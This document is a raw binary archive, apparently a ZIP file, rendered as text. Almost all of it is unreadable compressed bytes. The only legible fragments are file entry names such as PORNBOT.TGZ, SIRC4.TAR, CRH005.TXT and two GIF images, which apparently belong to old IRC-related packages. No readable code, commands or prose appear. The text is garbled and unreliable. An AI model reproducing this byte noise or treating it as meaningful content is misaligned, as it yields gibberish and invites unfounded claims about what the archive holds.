=`.ki!ٵ-b$|T: N3d0 |篑'xR`܍_S\ {m&sS2+Lmn5[jৃJJ穼Oo|9<*|O虝)?^_0"=Fnl3RE0E M^JwIƱjəvL>p&dIf..ayƞ^4|H6*_KB:EQx&2(/=fTY6v捥Ag,Ac:Yߊ b& .W v󴽗u%PN+nn*%ߒ^:hcV/Ms/W:W0błTxuJN7xnS"@O! 5G 0_ZNO_i0dtirpu2q ;\VہR| [RI2RHت*[?L"rU_HgP,$Ջœ"X<..7`ⳣi}#\t:NKQ ͊cr?ҟ΍jʔ+& R2@e:qx?zِCW_\pƜw=MAsS bf4Iu5n.v۾w_X׶4oj,]cT5?hZy gEGFT\J 858,5=MtPSwMvi=RIA]44 +Ta8*XR|5gU> u %JYƗpB2*9sSonʀ Ѓ^HJqWɥ' o'#o^Yob^6Vf@BifMt|%1}ow;P 4qiK)W 7n xJB*LlC8ݨ#}F2:4Dhxi!PMkugbs$>G5}_ـbת1믴k3l()uL.'2T8.j.{#QԯŘ_RV^h}h^l/@T*KVz"b<]2j15EZ:~YDz$(ڸ^3- ]ji@"8QvkQ<\{z9ŶJ7?fde4USOl7'Rj:ȇ $%}`w #Ɏ"lb:XVwNGkhTjDY?]zلkbLSG} 9ۻޡj]}+C"wewzor9*sSW^õ8pI[KzDvi94W)g@L-=Mj^fex1U|.LPSwacf0G|-lzikћ(qgTR'`›"ڿ/*PzB"~*k\wn2>sXb(Mm2>0wyb~ .WcfŎprw/:##uu"w]Qv| kB⚧kf_.5 ;ֳ+TI?5Au]dBSl5ksDFG1|9v5e%=MNt{Jg}[q~:@L]t  ''cjlVjٌ'k /WF s&b[0:eSjv(hc W=RR FfD_l(IH|I,(G"-[xYWyqia"Y1锁g}Ɍ\D $t0 t9w槯2υޙpۗ-8Z6,')$q7d`DsO])}{fW?48;ym^,%heVj躵uAIϻO7{~5`Wl/CJwCrؘHphSI."OK`2$5? gh><|ĖR^|=CEuA@xVf ]̦qN\I)4:]ax#?d35)g6A+Oxn>v8aS9S5}>{JEP[Ke46 }fM3%~zzC[@^WֶDjM3텒fEöO.0Ҥ&%iaF@C.Wi:K}}w.e"hg lEM c6ހqyN|' gA[L_5=.fɷs)C|'6kOY`Ldw9zSP#^F {pH56 qVh)'EF3fCUq󾬧 axZLl(,!}}f<{ [I3RS:v!+Ɇ]ha NHIgwOjg.\dRV|c~ͧ/8r:F eE W̰%4ҷ)ԆWM6|u)ZJ}yjI:b Zgod+d@!8nf:Mm]AYU~JlcA>eBItL;ߍEh=0"#|یLwy {w!-%F:f+1cNbn 싔4V Y&Ibx{UM_{˕-A(,pُg-J>4]g+69"dXS[(.Fry¾e¾hQ=pbOzxE/Q7^_).JkXWT 1F*~ƞ>…:_F`߫=ԏp__&Xq^_ }qk[zDFxۀ)rAjX}9[-U$ Nͬ>bz`4CpA +Ba9{F kƹZN) dsM38^Fԩ <`x ‰2xX_GCU2S*>?O=5[H-VAX~R\nwonOH)O#їY$S4T,SWnLlddp>٦TjjumWM6ߔf\]ͮnfW엸 {<0$5XKtP<0!)MAV7^dE37K՞yE% }v+Q-Qn&D{nI]D']V P7JIu_AOwj.e]>b쐙Yn`q Mv(]SOC|u݇K㨒$չ8Juaƶ[[O >㐿1˼;p;j`JGk+^!W'50 GVU0I^.SekCdG}+9Atd`]HGM?8SBs94u}DOKv ōF@N5@dDcD7t5+lx%! DD` 'OFWMXx aշ K  =yt5AD(lT'EM+)sr)}k=N3sqV(.r`0<2t$ ;?NqyՃ{7%%.d)._zJ@ǁî8Ku HwJ|T݇~?F*\=ETRN BlW1pγCa>OvG'6 CܣR/VM> !kLa۰^ᣤI-\kkMA)?_pἩ`xzG7*}EW,cϓy*eնG,<{R-Z8GNZ6W/Y87Zu|&#%F!L4_YUدZ=5SzJ_[?ߎ|STt['p5|k37ߵ9hkV`I9wO#kDEg%$qr*ۋ[H] ^w; zR>i%SC"T$aG vvI&W꾻tC' L?LЕ~'–+׼S^nGԜ̄WA#h=`ygz \%܄nzi;ʟ7c^*:H|B17w7([ē+ۯ^^(jY_&ߛqj\9{y>'2}\fm,u75؂TM.C*tG"6njaSϿ|ͮ}pHXg>v~Ux*(~g4lj tG6֩Pt7d矸i͠Bbדx*<\ D zhL}KqʆkDiS^SyXҺMZ:{mL|DDɱ,SZy{1DҪL'T|;8Q OqEH3rvN7 ٍB2{^j?Kj,N4צf:.XIHx1b`K_ly"Xc*kL|C$nW+?RbC&w@ V?C3=@xS_AOW+ oŞڽ9Nhxn_:.\I 0aV}Jv}{ϟtPK 8&#_qBBPCB.GIFGIF87a|"""333DDDUUUfffwww,|I8ͻ`(dih>p,_lxspH,Ȥrl:Ш2E"q `p0.cY}.xVu` b=~cdnkfba{ Z ,urx[`_]^ U BO]:R 8Q3OD%bF  2"mg'.! bȱ3/Ū*GltxBQ ~:w04O X䄏Ix`A1]t!O0CQ)ԐUBz]W8i^uK/?` bAJK~YlͰ֮xǖwVB$T`wDhcJuPXӊI44?$AVaX C'F Μ)ieѻ _Q0pnvaD^{py|r 8Hy-G߫2:t+9]8MVO4~!.X<'zMR|PWq4szH.-GC_SVbv$xJ5n0ҡWaIU9{<`=U{dv_r wx;eFl0mX]yF\$Tv[mɴ F@VADC`W&y4g&Ye(ҼS@.Gf!SeN hw rԕ)A=R8\MULǁj M 5)qQ’hԷ,¨*rgɔj^,?˘vEOܓ[ TzF4Q,wgͼrːg,b<,Rsꖞ%Mű<ޥh[eV8`-ǜ4(:0` 2XVh c 2e&ͭ␇1`ŕk@/ ":\ hpAoIG;BTvZn7N=~gt0x`O)ˢ r$ͻ}Ep% n+0XZPD9= o# ļ6HjnH`fE<&c&T@$d,рsApR!'9 Nǚr@xH@I>@C9@$'0QD-gޖELTDW\܄0$P2rkӃG6VizBkG̮x+;K:`Oؘ YO)`CpX퐴.r,:)(BA}'P-RAg‘Jt(P;A``ڃS#P/^|H#R#2RK FDX!W%쁺!.du(`@[%U*5eX& J 9) 7W ZXS5KYo'G$|Oz|)O0x'DtĬ4΋NAhD `vf˜(qwpf!a` W*P8fױgtK# ,֗ `,   ?J~F+)K7CzcJ [t `h Ru~=l/?Yl}?Lx G]tO$9N`dNW,cAM>SQryFJ"QСS`|\XFj''ԑR,- (c5HrVFq (?%L*uǁ c`Ue @@`Btr9F91]gk]0 Ml4P4U$YD-P1"FpQ,h ݕ1Qܡ5"(0$rLJ#MN( #W8hiN{uzUd8i]”-$Z4G:94xKJ ;׹F:[uPÍTiN2fXǟ;Hg8"Tjvr{hl`v%3 A+^({d|Yz0d h? ZnHC Ue(pQQ <(p BxEc5w6nUv;6}Lc MwGc8(͝ő1mRnYuQGǍAA->f2֖J?\>5ET 7+% "LR16ӈe0Cj9"yh -k9]F"#cM4@m;0)20=,>|2W8DW8C xM!8P8`pJxbduu PC9 ԓ_@c/dT5BpG2Bx d@_`ʉ7іK@&h WA 8.W8}QEr< ΣNWhT63O çRD^oS2BȆQ .ĕְ'Z.XPKMMcar•pos, eЏv t(`]|>AYؓĥ&QD5%UH:5@%Nd|*F* s[(FSā7ˆ[`%qG9^&73(UhZ6JVe4syʶqP@+ω W)9%(#pUKMr/l'JpUMA1&rjB9?)dwL!yBU.D!`f:'p.ħn2tā^+Vϰ}bSB= ',8\Uд{㹾}y1a;"p>2)Lȼ&P,0 phx4qTpe9e} &2,.6@FRVZ^Mb jrzɁ:}ޘ~łV nD;PK&# ʯM3N circuit.gifPK 8&#_qBB MPCB.GIFPKnZ^PK I .#z\BB PORNBOT.TGZ'4pornbot2.tar[p}_ْ\L$ %lY't ƒValӮu{ݓw*4e!0iJJ&$N3M?ir@Ƙ`~ۻ@jJS<{}}[g-6*վ)Ji+;X{wGº&Q^9j3ؖ.w%+/h*ko𤋮XOG&sSl!ީ@KYkaW?E$ik&9df(S$v`_9K'لeDr\Mnʲ3NC4l-!DZ2q0f)o8٫@ 3D:ح4x(mM:mqw2991Ss#eCja`5FM5]` k5,2o 7"pC@̶la{̄rnKPaQ7g8 Ax[crXy"H3cшik#lIT["9I1M7+QIDiai] S80'}CfSǙb ;al/%5{ >2I  XHV^TV'+1 ^{n-Kڸ1KDS/fHd>AA @/zi\.hww&"RhaATQW5\Qj:9?`ۺ')KZA|g1Zב_eaR曓-^G&M5y6<+=^cCip̗8<IE$oF$ddr7.~ZVwZ3G]υ tyK8Zc(f$?TJV"TD" ]ũmlXavv|pwF P߇*A a-rEa$ lHXi|^pAM`r->:O@oP7V:I%)Y-:HOf=zq0ag*D&M@? DE:%CFD>eY2Lv7 x@h R쳲ZvCE0Tˑ!/Jd=%FLKĎ+8`ڂѲēC:&ׂ0Nٕ쀄%Rp/"j'ITl'iMi VBsV|ZOCmK΄0+}r)x+LP{<+,H)W@am mIm̥ hE_q&D +f8+K 3j!:|TQHwRK!,31 j'd6n=*<'0(n#FAxŧ1QG5>IRڥrg^kI/r֟4koxTG9s.}D ~;ai+!BwPضL<~*Ϡ}sTOOuܣ-mi!QNJQrlW(qR|o^B]uau=Q|YuJBSwu_YOe{l+7Z=~ ؍|~HAE跚_B4<=h7&7aW) V e|Uh!# 뿂ZBKZr_/.g!!E}69ruԓ ߣ7Ir?wR ~Hzuoѿ _Z߂.;&~O |2Aحݻ;=n߾'oǕ8IW##0 ka[B>ՙ0QRR =c%hn*KL'8}a[i%{_\|;W=JsM!k+ ]a8&<Ì+%q)eǂ,5S如 S(VIWхaSj~Ο[@i$u?ąNk47:gx}N'w}R05[a>ĵüOwPI :mO)Lͷ>IE05xCORҳWxS2Ijq?')sYsS?8W٩ձܿ γ93}k[75d8/wUhu]r6?P0Yw2 ]ʳUd!B g^Uro|i祹9C}\0}A'#oLۮ_zW mJpq5.Pl0Gl@.яZ%諰E#JOKMGqt5{D=V:}nOn;q*.a\S=L&)x|ϝ~uY ;hԹ^X-,}yfy=;/JVZ?9w2PC0 .~e'_g+QU}nm+x(׉ }0ۇ/xO]u,KI:. v>7פg~˪o|KO+suowaCs V*i+k;=g?7>gמ{=vXQ i0mӯi̿ 0ƒ1sv&rfSb#} `wEݭ 0oۧ.לo|>#"*u?bv;#U~w7o5wu#uy{.COUsp ~` җ \n|Kl?/ 8 m`!}i0E8r&Wꅳi|`R+<7r[<%L ?@ޭp:_3d| ( x#1qr]q g7=s|~^4ջP8/@  _еtVA^F!FfZl)7M#fڨfo64)|H::n&C6MIZZ[&qD/ +w )sZB?<b0XKūwVDuS 9TIDPA7M6%RBE?x x'}fI<σ~fKvx( ƍ"mc 7X O|}a^ֹNV&̔ɛi>l|㊴c '|\7]~?;|{}wyQ:7f&r`WJ?93o*hɅI'!uƲuoLmN9Ƴ]|KMoS?.ME.mz )>zkT"W:jdiA<t =цgXO/y+Lx\I8++KWm^\+)ptjc-\^̔zGd}QI=Ӛ-)XSI$4>m%qӊ ϭx\{5v^ڻd;5ߟ=G]+(׷=pM}<*׃ kO/l-VxN<Fu]ܞo \{ Gcs%h #FlK+XԺjTC$8?5vik ,X`~F0PPKP", SIRC4.TAR\{WHϿçb" LL9RȒF-CGwd,3`Yꮮǯ[QQ?CzkcCӯ}/b``MAqGl7TBӴX{(Z fQ,[؂l [ͭ;?Dc5Y "ȢQ@RtOeq966u~?yPKXJt$H1İ+KJt'xNkijPD;;R=..3Mn48E~"~GI~xR#QQڤ:+TOem%QqS2;2h~4Pe~wͻηM<\?p˷or7XGi. v$-' L&bSzbh Hܟ3 R8#+,ea%zVD2G0g ZEj]D~L4 CI`, oHӃi~&.M<E*P$IJo|&a./%~s??Ѓ`G.b?岇tBq~D~WRF!]@K\\ҳq.)|L&`EDqzhLJQtN RS$6X=?|.c?#Mr8R93I2@2˘IɄ}&~ 5MdDIRIirLL7p /疧'2/,5! :E:"JTR@նVدj7 u瓘g9}3W`ϤKJ#\i hI_uKfUsyɚp~MfSpxS0s"KL4ː3e/D !XMIU_&Dڮ`.QG/uU~\Ȝ$FELSSoNjs1Imws{pZn|zTw͟7rw/O7: Gmfc٘|I֪d66+r[>u݀M݂ߧt 0o}}nu<}|a{5)?^ރ#Ub'MgfΘbdJg ͱuGI"_vД >?xSHt|+VĠK'Dhbk`,+vVw<  ۢq®OjEho>u%+]=_\j@wZ̓P!"Rזэ"bkk;aq;V6aOw4^2@} 3hWKb'yH8ˬR\qYh0 e%gk͒I44 c gy:fɬ3Ũ <8J3$㵭38Y^94RJU(bu D@^Uɋ#deϏfq!NWh dpf(4!B amq}>ر8<̺er ?籎Ƥ9&% *H `g,TM]:i|~| z$T !O"@Vs)0ZX+X a+Z#ysܗ! >HD !GD/~%#;u`,J $'*Ϻ-b @<^0{4JW;J Bc#*)UdNHM& #@Fq4-_/glCyʤ`ytpt`3ii=oXhJAۘM^ZCU2' fn+fy&XCbJT J`Ni ЭR]<9v|n|_.>z5o͎|9?6 9#:{%˂1+YP,a(6a!ހ|'Mf`4%Ұae=RQo{(ɸxuw!ѻCށ0B"|UGfRWpJ~2dvz pMTÊVFZo]gFMTu@ob}eWLkI}=^n`$7,9iPsTAE]@*~aTppNф{Qe>AL@}uǑ2+jYqp1Yy]):"8KҋXc$ᢂ9Rʻ@q3Hs+.BHt4dbO{gڿ 6B=!)L"(͕@Ӫn?[Z?A4]wYnrEVtDť'xFXj^Cŗ-$w2%V`jV},l9by;We6k}oִuōARBi[-ե=+EhVm0d%*7Zqc?2412R~u*Oz{d%FkᛏD{cI89闤+ZM"^vWC53)? $Qb#QRڇSF-s(2LLJYMO3Rk[Hᡆ],aw [걆ص2r-Sգ\ѧiEwq %C+I(0.:`cr}iӽPc4j2d.w,GwLﺅjmwq7*sRZiRG6(f;0gݻC)9{]jHN+t|NcNͭmXIՔm\s.rqEi[|"e;-9zz,zbҒaC}n:]['h`˾/ٰp7 ~%Xo>go1q{T0)DgQfOpXB&m9y=(txH*I''措{T9ipNa4qހ&[a"ʑ2gռ_M[\d+Ug@Sշ,!4K˫ d3+ʚFS_<qfuEF_eO\uV:,I[e&IB[O@1cI{#9%G{m)Y:]?^g(VfFk wme<^j 4r˚ 'ϡmV9H!2gSw<)C9qJ]&'iχYUknZ]ܨRH ЯF@Z@m[ x;̻fJk)ȹwlCh<Uy[T<&nW C/»sbNOt]텇9nϡ߭[7 Tb{ l$y5OOmS XhG`B`=F/`]opy~oWk-TR~M+~eo7vj}]}xXwɽx~'iRuk3Ϲ"ߙxSjvn ʸeIZ7: E x3BT/=v Q&/pұ9xvϹTo:Yg{Ѻㆭ m4B/؊lncmŚ=Z$59J@K;UYQ#r~bp2-w%Pn_'[8+u[P56K]|֒mj{#LK Ne3@đI/o4%;ԩR+y?a$/Ύ6n]،+ZF.~nZyGA\o Pl L2 Qij%7Ҁuci5BN4|'Wd1סM;Hv!Q7˽VW +=7.P:\&S?k v\U'GhtrƢ3chNB0+54n,c MM3мO^)aYttkG",-2ҁɴGLi6(ʜ+#YK' Ա|ԷuEw'hAˊ8i"WтMz+o63c]{o_B@)dd4Hdv!P${GVݙٝ;(c7gJM2%g w&.{mhdžnRò=p8;VG3hU^r9-=j,fMΞP1yA%nkSY0Jӝj|{xC՛By?ZoƛUиN:9d'N{~].6^{VV2c539残^ Y8R/gjv$,asix%i`Khd%i`Kǒ4~ D++IɩZ5Z?GV3܁(`$­@O[ '-^ ߵQ) Æ 1' +w;֎k5K,Sk=k Z#ܱ[_::F%Kß K/g8.zV!wSRrTdE56G%8-bV`,ayɿTj:|AUcsTə/+[dE56P_RQgK%BVMGIThGq} Fg:R?5!Z!Gsi苚;(,~1F'F=ܽ"IacCqtttD[8ڟ!hƑ6S)pu_K1eX"ږ}Rk_^6I&h{W`}1->Mr ^@Rfx<9d ~frk cwDhH i6@\E4sKbUE,^fE ILuЭ#C~ 3 bQȨ&ONzR硻`"KCwy'݁7tMP-0ȒPOޞ!_Qbmt1}ױ.rl&"Z|)ɲ<|/#}x9ބ(J(-fE{;Q +@h {kx; c֬Ac{}ikjzw4֚&(K6f#/)kbj68~<b2d6Y^υ1qv}7)QsT|ӻ"0ū?kf"p>r8`ܛg{Kw7c,}+~(Z( ד >E52=YDh |B*=N>1 ;XdDL-?OTt |g_8u9uWxwH&sP2 DaX% nxwar”4 Bofp8%Mu MftTtD$ێ5KV&gJnҎxǥJ7oY;tgL\d],|wV5p,![ g 4EI\MYߞm6KCPO3B*#W:9Y3pzQ47oOK;p'ۅf@@Awd.1w3yp`mq["SL$z8?QtԘ:R'0-~_:^[~mEP,9+_*KEͪ>M Ui*3AkU-^ۖ( ) ]S8yVJQС:AQcwN&|MQKi@M{ 9mQ'80cUibi [咣>,4hO*J tZmn`|p1"_)M8:?)>v@-H E.sbmLÂZ^Ap/hı3 l$'^5Ux󵪢*5N34NbԺ*I?o{zmLF|uO dD'{\FsO~FI`^g,' IAeas$107Dp}k t;,jFFz栫o(a7jI[U$,f|_Q+}*fY~.Bݕ>UEǨ#kCqD.V5SDMG~5=@#8GVF#-3@6/ǁI' =:%4_*m8Td)b6Aψz^ 8*峢l_gjBT)f 3TWtVO4*lx7Wx4V{!*Q^B^oa!'c6!$zr/uՏn̈́rK1ʘ.ŀEwd)@Uv cr/6òW+K0 &_ ,Sg?Vo>^9IÙp^C~t4Lh r l٩n$Z)"]Yn&7T-;(ׅ?6oz,d_rP+UwYwt3G}A9[bqzS^H{ =5,)S&\i4@3G ?Lkhgho&5* 0@,eARs&_C2 08\c4HW6W:\~T‹GK 7j&pY#UN\r}9,&Gl5z|{MkV[óG;?w(wMMISUNAm;tLJ$#8_:МwmgܧbOn@u;' q~rv^L6NgwOi.o_Nkܵo/^={yqyUU`EyˆU5s:5Y{c;n]trVD6{cEyNT&PR'd(a'>Lvq $n2.r]po`P0٘9uF캭6-+pW%y$?Y8"֣mTUP1 t6A?m#k, VY!a/2kVH ?hG0u(f|#ʣ-`#6ZpA0HԠS.l9LoMã(5g S)& ш+XU7+J5;9\}K@mH싇)S10[s(~c $ o.wjXo6].+aywHH^xU~F+ T3|BzOaEmA.t>5Bn(ةЖ ȋ*TeMҡßGЯTնx8mޝB? V}MyG`ñk-Pyc>gl}>gl}>g=PKC2#k6FfMb CRH005.TXT[{wƶf|blNpBY$+1嶄4W#8<>]?ɒJn=:[~ku]kT`ѬL/˲66CHvDHr=vF4q/9"\BYzEu>ݙ eV,w-:7[ٵ7-z YߪY9bqk+g?-yzÇg}eUw~ٽ,$1',hy;ۂ]ҍȓAk1tiSTڸl¥# PNJdD:m]iw ıi$ñɦ-kk͸_"}; zTd3:H[--?CaHwń"xX_Iȑ2ΘNj?CvY4<>O ڴ8@υ/qǢR8_ s u( ), ߛ= hM7v=9Ƚ"C<"l3xBHLcMsO9@XMHml {lĠI~@نRnKl/3iE}:lkm{~{˜s P3/8g%n=%M`ba$(%T=_*9쏫8KWZW/et(F*oCj1v _̀0c Gg{GT×i#fsxFdW M:>aHF_ I{Vm?p-ܦc*nړ~<גv_a^TkRp ^CuJ\z "BG!;5:  [wk{Px><h5MBfu sǏ]鲢!#.#E]]Q^Abp @ (sndlߧfDpM瘬6 Ή n:BEX{ E)P !@p)NymXgqA &#p ;VW\j_{@Ȥв5߫vXkA?f.G TZ!.QBϞaI_,(),J`hiC?v.} TX #!%B٠6`{DxHhz"@-{o H$-xo;#X4Z@4chrG_~9;0A 80G<l:,#5"+{XӬZVcj>e#bpr"C3Od0oل)}% a9H[< DV *wU+oz>ɗ4>zqB_O~tڧ'd) cwM&9Mwr3lBw~Df3=(_v5WfҤX7h(zn-wpӱ#O1tfʠ؊t&E |cD^_ _CvjŦ 6_o\rqG!X{d bY _qЖHXc8$<!+T5??CKQ,T H%Nj_aEj`9QVum;Gh;rA셳^5V;@ Rs:|Ogٹ::xS##* +ɆAPR4n[l ZVѼֶ)c9Oz}v^h,!OPh>I}'qOZ%+WBL{gpf1(\)0,FE6Vh<j:bS]V;`7Au8ztz>wxG=tH ^]չSܯJDm#T\mJWPtx{rKi/{v׭*J0g@};6|P% A黲=m $jT,\&@=*nw!hV ]5*-N/`c{ ҃'+gA\^jpw^T2OW?&t3[}~uKD芕X8V#uq7W4Dp_U1j/;p*%>+ ELgP*I;m8zIkWj`fMm*nLePJGa唄!o-WEUJI-fa ORm&7LlplV4ۗM7๦h7xȆ+l˶o#kfAagG$,8m~-* UŐZ0Ѕ**2wl) b]ܙp"x^Igȣ #ЂC_2xZG3x`<*E~!g0Ϙ٬R|aOA 9 x١԰&iK ` z[l~jGRuZr:I6ӈ:"c͢ ZOD*zX0xR^s$,fO&YX@[g@VZ[%݁8Cknt2o䘧'rd%N8UyQ߯[s(;W~+Ѵ'@fX PY<> ? y~kfkњfp]lk&=xwJ dP!$bn"( 4B$^*=ֽe1W"xٺ  gdb/#7dnޤFצ^ڄ[ޠ qPnWg)~f㺰}.N`SWoLkC)R{$elN!+j.3=T">b8c֟0$ѺJ5mɣELoX;cڬ lc@@ +'?~-a w$rN֮O48L$#AEnK$D?pEkA0{ >~!<4=Ǧ_疧x4;O{(mtWͧ#ZCwRABчDdn#T#0y)gDQm֠DM d8BGe(*_G1C2qm('fs>b*1 ^ _ب 4=Ju )7VVWpgD=CnGwL~sPlgLfarEkŸz.pPbA$Hȝ\ye E!?,Slj^in4{lMb@)1oX1,RwzQ_ȴ<(b㟊0JQ%H^s,<0߼ 3~UR|.<O#Et.6e^[]@aP0evLDm I_JޤI~߂yfþ}JD;ںSҡQ} M"컾Ͻ7d1 Y֨7CMBa"}HT`ީ4.+%>\ݡ'ߡjI ~ؚC_lM)P W|cjy4(r01t)mDr8Gw9NnY>|}.ηc":b;ls ߷p.&hs'_dZD{K{[nR$t4 g˴]*c 9VbN_Ck+4K2]?_܆;CO{ߺ޶zCKvFMBf|%DxlPDDEO^^z |_vGl {❝NGNg& (aƮ" b#h`qy~7M;!>Ww_d}5OIɗzank*S|3'5Ƹw f H 76֚>^i%r/.};O7; @1fnbmM֥΃u894M㫴EY,x.'#~thx}W=mSoq${Wҡ*?FuY$b?wp4t?*GOEEޢ\Ս!Fk)zF+RlN_|lmIt|ϯ~Ɍ}uhfx Gyታ ȟ7l]z׻ԼQW6s71ocLkڢ {ׁ1ӕ)oZuьJ@gI(MY}3fm7㩯eӳNdorFZټ[iU6N`v2l$8o󞪣W?GkMl/A(p$*CN(5 v7(nyq:`1?ʯl^n$c,#qMFr<\'% AyH򈝄HL/bo-6S6yd+T.UEHcԐ GMʃ,KO9ԼлѬ/  `668M oLoDAt]ƒJHj(]ok'x]<2tbW*ۍ]2o)ߜYidYD?"7{in?Hs9@o9n4Y [JK3}.[h8 !\8+p" &*[IWFZYqnhLbڄ:?P{9_n y8dAXY~`Nu8$D IJ{ՑdҸ\RooTΝ-nw !7*B}%&bѨ^kY.~Ga¡!v{=<%$OqQv L~+D/&2 2Ns$]H[zw8νb&EK^.)N,<33|a{ =L9U8 +mEu^lp 64-"EUjܚ~͈>ow-^>K_-2L]4'Z̿}f*z+]A?~Um=y}P`|aK#klEw#bHJc0jÉ̍wIH:(nDg/k(Og+&l3 %^ǯ fd^e:b_WݓZĻFϹ>&\Q9A}8f'y%ǀTp QrLgSƗnLpÛ 2ΕoN0-[OLqY>"}*W|.qiAiO)h45W;j^̥D}7sU^"=M+3TsQ˔Dfk^ZRG1yDT($0GEb%ϝM!Rƛ^)1YjiW8W@u5K@vC8А*`Y=kP i_vS[R/E!*Ԇ\X-iZrV#c d j~etze!ױ8ED8?DF#QВu\VJ#Cr)nI@tit0 iT>dtdiwGw9lI}ىm@3?!DŽ dĬw{&,T"m/zn=43)iRȐi~ErȅӦQ,9uIC&.T]jN͸ ڂzupu\ے8r.os v M uGN n.%XA[U:繇 V}qbKE; 8PzX^ a5n$[Es-PTҁJ4HEIZNGIYk 3t3B#u5KƲ{[`ZtzHUɊNJWh_v @>Y)T-# t&lO^FEN Rn#MyqF$\Up*ӟrMFbT^~biOXTruCHUO$)1hi;~KZvç@ק*νd~ZjܰЗd"rXQ;̪BaZx) tp < Z5+bH+Kx;lz ڡ$0sEq)~, #`ygMixMyô3ّtN0|$ z@3) ;Y^>i $gC!c )̺tu\]82sFU)W*]Y|㟊l䴡NDpp@qɹ^\GizpPPjjU=KcBdtN۲ދZ=!L3iFEb"'z Tk" 6g eGa]ڍ4Ad lU*;]6h.H-\M@>sVSJW"ݲ8B-qֺvĞZHy 9(xrl3-U Q.",SBZ".U hH9utGg@&Y,/ ͣUKqAV"ͥ8`#', ׀_ v#D"tIE%WB:/Rs0/{_h{4#.4yhk'J5XgE,n8YAQ򩪬.$|0wt-ygJ|>h/l6CǓ[\"&ǟiZ()s0X_(D*gvsMKFJK12~S,puF') 1L) q`@pڔ}m:@eNvq禵! IQ#$"/kb4k繁0APB<`pEEa阀XH2y4:f~\R µ>}/Zm&\(UbAal$Vt-i9~W92)Y "dC$"G{p@ \ 4nBbFvT2Awl9TyCg)-1@RҶe]E%|B:o<E&j48o_]6`*8$/v #6v:e~kk bl %C$14avF!L(ַeMrP'H 8Ъi&dousȯ,lEs@ڐj$qAFa7t™ @ dBRb"Oq#/;LBY|peml\uHA:;{bh[K>2WŔ|p@\t*0=AXU Ղ Mzq]615 `&!n cRb{\wGОNf۳hOsͶXă.&z)t1fR/dجv̬<Jޏ:^=/8VGOJPJύwndy[8aW_NL7WSxv6񂳾ͬ<[x(:g$ J'7+rA bem!e'q,HY6@R\$%zԙ&$Yct9ݳ8ĻvHgMG@\mƸ8/%bAtAin N8ۆͪ';:lwSr.w}-- tMENRAg^Ou6._*LDl ldNjTv"z!D'EDwk\ ~0۬Guћ>L0?.Ѓ3]y"p+wil{ڛH߯lڢ@yIMq%:n zTH-Bw"AYЇ%E8'g\l`j'@iIFPAWUNuzc=v/OOa^D35}jWE^13f#F-EOgѥOf5?GM^ild9['GY(Vsbd;༼҉| ETq]l r]fRzdNqsOq| 3,҇BrtÜ{(C^AVo?\6Ԡ!mJᵬi8;Y,%}~"D]fFahZZr(8eHk1w%5A tr*}f%6#PO3UE}VL\L@Ĩc1lZ-xx3r*WA{ע,M{QQ`Kb+PK av'б!_3*GN]Pq.8&G3a `. wA%7"lA˫:=[[0*c˲ZUiUS.vnilXZ3c Ahw6Og 5'rʱ~GUu@H7MMILj(s$ 3T%26$)}ALB9EYSmM90*wgn3; n7pv`GgJ0pJ<֍J6jљP~mϥo0"-15Ͳn~n.# ]"|]^^ZWOYu@45FQE7c<}[n{wn2*%_mm'BW+f{QЩinZnJK1ܫA-iŵK@9.E69Lj<*+= c VNm_,)SH_[n߼|mmClJmۛN[5sIulƳt7Wؾ`vfg(7g^F&-Q 򸹵L2eۏM =mN$=l<+xl >uN-7S)gl{23DkV; 6A)%h @€H RHTw 9-Kp;1~9S,ɏF PT911A,ƻ>gAxa[atf]'vWo0)*QU|]y4f%qួ=:~PMSvw.IؗSܪ!x I*?0}ne* b;Vp ~ʫ퉅Ewz].O4y[6׃G)77K[-J\'@;4G~vGLǏ8:qneoz.M; HQ 0D* 'â:?uchZpS;/xCU'59ʊ(wpwh2^݉/a`퍭Jy&M 6ɾ":_U黥q0DNX /Ͻ8\hao:Jyy}}ΠR+Qa488ph#;K%CJν_ 2l$~k*~!.$+xxF.B%t]m졡}0rړ^ol%Ҋ|0Ȏ=6sK'@'gKmqڧ9̯OT*ћxYa6SLcD+%$ zCf!u)s Lj,>Ab~ܙكvƨ|y!,=,mnjEe%0xmM-H|$QMx4pBMnC::M1|B\_U 9ѰBRN΅K YAP)Q;(UG|1RyQe"s,Beu=Ϋ4 `Եk"՝V;_)osgp ؿبSLĥnFMID\Y CkhSQT`}q(.d8\\eWD+AEq47B&FQ 21t'CȈ~4o|8ZCDͫ.h#i*!qcó'Sm<;{N>Xc9wHcl^Ρw91 0Y^cxM\ɯ[fۖwiދ6`QMq:81d/js'qzUq I..es!A?h::bE}a< 7`@I#6ZWYKEaӇ] ^s9$;0!Q a)~}8+=^8ua0? )&V8@φ(fQ8AOdؽrONN)`F8Cj#9jσpwuj$2y, N2 דg*"i5CBH%۽cSJ{Gi4$j~'Ds )[[uPi'9-W6c+[#K׉bm_y~WDZ-9NQݷZj\,˺Ļ67E%[g4@ܒ}rDav5Ovqħ2GaR9t2,F {f-h E&x2LmRԉ_ :K 4=7;¨E;H\6M1Cvp.n^g.76F:-h.H-|Iv[-BdaPGzq[oxK.'!fD\>T?b_UvEWzVfԼ̮s(Ag4?DO'L}_}b[کگzj~˚9z{of}݊  xOɢߥχ;{?/Oqje"$}qfr`^%&3Xx3ϙC}Tz^v S! A~1CGwqk)߁4^b#}@83IDϷO g\DS~쑟G>@$gm&a{Hi?sx+­ !y_ 02ob&}>i(3:%̨퍽g xN_ddp\-r|r_F gU̯Fu]9ޘNaOl?ګ)Y b&N;h SPROU%~.`:^zQpR`|C7:T/%DN#XH(6(q#&4l66.w(q8,zIeƕ :BQ\*wժ<^e D5 'n|{Lӆ^-< a#z|>C[ӣ4?Itmm[w'QkN8P>Q |p :bݙ{ҝS{_ ,ގPoE`$ENjRaGub%duu>CvwUvr$[&atHCr_Y<56LOr('} v2I oq3pLטsYv眏ea Lpe6]o4c%:F0 Vg9tWp)d9s?W*IC1@ղbtSFL3ag HJܕ fFݝ%' uXdŏ3b@cTT oI֙80bVؠLN,ےKʀm^I:"z=[jص3Suz$5')@z>m*М9f&$E؀rN]]65cW:e3 sNu+xy`:N y3q,pW_6̊p$o>3SP.:eZMOŻ$p$x%<sW?ԊX LqEpjwɍSʯnB/6xK[a6@^r _te"1el Gs c3qK<ϙPv"#IOỸ?}ňX2Y6rkyp|<&1V+[>(;$,{S2 Mu1!6LiQq4W5êid/p*jyv3e![mwk3ma1]&5`{ Bɷ!ώ(tZ$5*L4C2Ho ;m]:3tѤqG&rmώ'IIO dYzG[P_‰sfOc|eA ]jƻ$Y޾T2RX[CnL9}Ȱԁ.U?*.0%#Kk&ƛ \:- 